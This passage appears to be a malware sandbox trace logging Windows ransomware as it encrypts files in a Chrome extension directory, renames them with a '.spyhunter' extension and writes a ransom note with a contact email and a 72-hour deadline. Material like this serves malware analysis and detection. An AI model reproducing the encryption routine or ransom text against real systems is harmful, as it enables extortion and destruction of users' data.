pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json.spyhunter") returned 174 [0157.958] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json.spyhunter")) returned 1 [0157.958] GetProcessHeap () returned 0x2c0000 [0157.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.959] GetProcessHeap () returned 0x2c0000 [0157.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0157.959] GetProcessHeap () returned 0x2c0000 [0157.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cef850 | out: hHeap=0x2c0000) returned 1 [0157.959] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eae0 | out: pbBuffer=0x270eae0) returned 1 [0157.959] GetProcessHeap () returned 0x2c0000 [0157.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0157.959] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270ead8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270ead8*=0x30) returned 1 [0157.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0157.959] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css") returned 159 [0157.960] StrStrW (lpFirst="material_css_min.css", lpSrch=".txt") returned 0x0 [0157.960] GetProcessHeap () returned 0x2c0000 [0157.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0157.960] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ea9c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270ea9c*=0x2800, lpOverlapped=0x0) returned 1 [0157.999] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.999] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ea9c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270ea9c*=0x2800, lpOverlapped=0x0) returned 1 [0157.999] GetProcessHeap () returned 0x2c0000 [0157.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0157.999] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.999] WriteFile (in: hFile=0x178, lpBuffer=0x270eadc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ea9c, lpOverlapped=0x0 | out: lpBuffer=0x270eadc*, lpNumberOfBytesWritten=0x270ea9c*=0x4, lpOverlapped=0x0) returned 1 [0158.037] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ea9c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270ea9c*=0x30, lpOverlapped=0x0) returned 1 [0158.037] CloseHandle (hObject=0x178) returned 1 [0158.037] GetProcessHeap () returned 0x2c0000 [0158.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0158.037] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css.spyhunter") returned 169 [0158.037] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css.spyhunter")) returned 1 [0158.038] GetProcessHeap () returned 0x2c0000 [0158.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0158.038] GetProcessHeap () returned 0x2c0000 [0158.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0158.038] GetProcessHeap () returned 0x2c0000 [0158.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f21e50 | out: hHeap=0x2c0000) returned 1 [0158.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0158.039] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0158.039] WriteFile (in: hFile=0x178, lpBuffer=0x270ea0f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eb38, lpOverlapped=0x0 | out: lpBuffer=0x270ea0f*, lpNumberOfBytesWritten=0x270eb38*=0x127, lpOverlapped=0x0) returned 1 [0158.040] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0158.040] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eb38, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eb38*=0x2ac, lpOverlapped=0x0) returned 1 [0158.040] CloseHandle (hObject=0x178) returned 1 [0158.040] GetProcessHeap () returned 0x2c0000 [0158.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3009d30 | out: hHeap=0x2c0000) returned 1 [0158.041] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ead8 | out: pbBuffer=0x270ead8) returned 1 [0158.041] GetProcessHeap () returned 0x2c0000 [0158.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0158.041] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270ead0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270ead0*=0x30) returned 1 [0158.041] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0158.042] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js") returned 166 [0158.042] StrStrW (lpFirst="view.js", lpSrch=".txt") returned 0x0 [0158.042] GetProcessHeap () returned 0x2c0000 [0158.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0158.042] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ea94, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ea94*=0x945, lpOverlapped=0x0) returned 1 [0158.045] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff6bb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.045] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x945, lpNumberOfBytesWritten=0x270ea94, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ea94*=0x945, lpOverlapped=0x0) returned 1 [0158.045] GetProcessHeap () returned 0x2c0000 [0158.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0158.045] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.045] WriteFile (in: hFile=0x178, lpBuffer=0x270ead4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ea94, lpOverlapped=0x0 | out: lpBuffer=0x270ead4*, lpNumberOfBytesWritten=0x270ea94*=0x4, lpOverlapped=0x0) returned 1 [0158.046] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ea94, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270ea94*=0x30, lpOverlapped=0x0) returned 1 [0158.046] CloseHandle (hObject=0x178) returned 1 [0158.046] GetProcessHeap () returned 0x2c0000 [0158.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0158.046] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js.spyhunter") returned 176 [0158.046] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js.spyhunter")) returned 1 [0158.808] GetProcessHeap () returned 0x2c0000 [0158.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0158.808] GetProcessHeap () returned 0x2c0000 [0158.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0158.808] GetProcessHeap () returned 0x2c0000 [0158.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3009b98 | out: hHeap=0x2c0000) returned 1 [0158.808] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ead0 | out: pbBuffer=0x270ead0) returned 1 [0158.808] GetProcessHeap () returned 0x2c0000 [0158.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0158.808] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eac8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eac8*=0x30) returned 1 [0158.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0158.809] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html") returned 168 [0158.809] StrStrW (lpFirst="view.html", lpSrch=".txt") returned 0x0 [0158.809] GetProcessHeap () returned 0x2c0000 [0158.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0158.809] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ea8c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ea8c*=0x174c, lpOverlapped=0x0) returned 1 [0158.886] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffe8b4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.886] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x174c, lpNumberOfBytesWritten=0x270ea8c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ea8c*=0x174c, lpOverlapped=0x0) returned 1 [0158.886] GetProcessHeap () returned 0x2c0000 [0158.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0158.886] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.886] WriteFile (in: hFile=0x178, lpBuffer=0x270eacc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ea8c, lpOverlapped=0x0 | out: lpBuffer=0x270eacc*, lpNumberOfBytesWritten=0x270ea8c*=0x4, lpOverlapped=0x0) returned 1 [0158.887] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ea8c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270ea8c*=0x30, lpOverlapped=0x0) returned 1 [0158.887] CloseHandle (hObject=0x178) returned 1 [0158.887] GetProcessHeap () returned 0x2c0000 [0158.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0158.887] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html.spyhunter") returned 178 [0158.887] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html.spyhunter")) returned 1 [0158.888] GetProcessHeap () returned 0x2c0000 [0158.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0158.888] GetProcessHeap () returned 0x2c0000 [0158.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0158.888] GetProcessHeap () returned 0x2c0000 [0158.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30099f8 | out: hHeap=0x2c0000) returned 1 [0158.888] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ead0 | out: pbBuffer=0x270ead0) returned 1 [0158.888] GetProcessHeap () returned 0x2c0000 [0158.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0158.888] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eac8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eac8*=0x30) returned 1 [0158.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0158.889] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css") returned 162 [0158.889] StrStrW (lpFirst="cast_app.css", lpSrch=".txt") returned 0x0 [0158.889] GetProcessHeap () returned 0x2c0000 [0158.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0158.889] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ea8c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ea8c*=0x1a1d, lpOverlapped=0x0) returned 1 [0158.963] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffe5e3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.963] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1a1d, lpNumberOfBytesWritten=0x270ea8c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ea8c*=0x1a1d, lpOverlapped=0x0) returned 1 [0158.963] GetProcessHeap () returned 0x2c0000 [0158.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0158.963] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.963] WriteFile (in: hFile=0x178, lpBuffer=0x270eacc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ea8c, lpOverlapped=0x0 | out: lpBuffer=0x270eacc*, lpNumberOfBytesWritten=0x270ea8c*=0x4, lpOverlapped=0x0) returned 1 [0158.963] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ea8c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270ea8c*=0x30, lpOverlapped=0x0) returned 1 [0158.963] CloseHandle (hObject=0x178) returned 1 [0158.963] GetProcessHeap () returned 0x2c0000 [0158.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0158.963] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css.spyhunter") returned 172 [0158.963] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css.spyhunter")) returned 1 [0158.964] GetProcessHeap () returned 0x2c0000 [0158.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0158.964] GetProcessHeap () returned 0x2c0000 [0158.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0158.964] GetProcessHeap () returned 0x2c0000 [0158.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f207f0 | out: hHeap=0x2c0000) returned 1 [0158.965] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eac8 | out: pbBuffer=0x270eac8) returned 1 [0158.965] GetProcessHeap () returned 0x2c0000 [0158.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0158.965] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eac0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eac0*=0x30) returned 1 [0158.965] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0158.965] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html") returned 162 [0158.965] StrStrW (lpFirst="cast_route_details.html", lpSrch=".txt") returned 0x0 [0158.965] GetProcessHeap () returned 0x2c0000 [0158.966] RtlAllocateHeap (HeapHandle=0x2c0000, 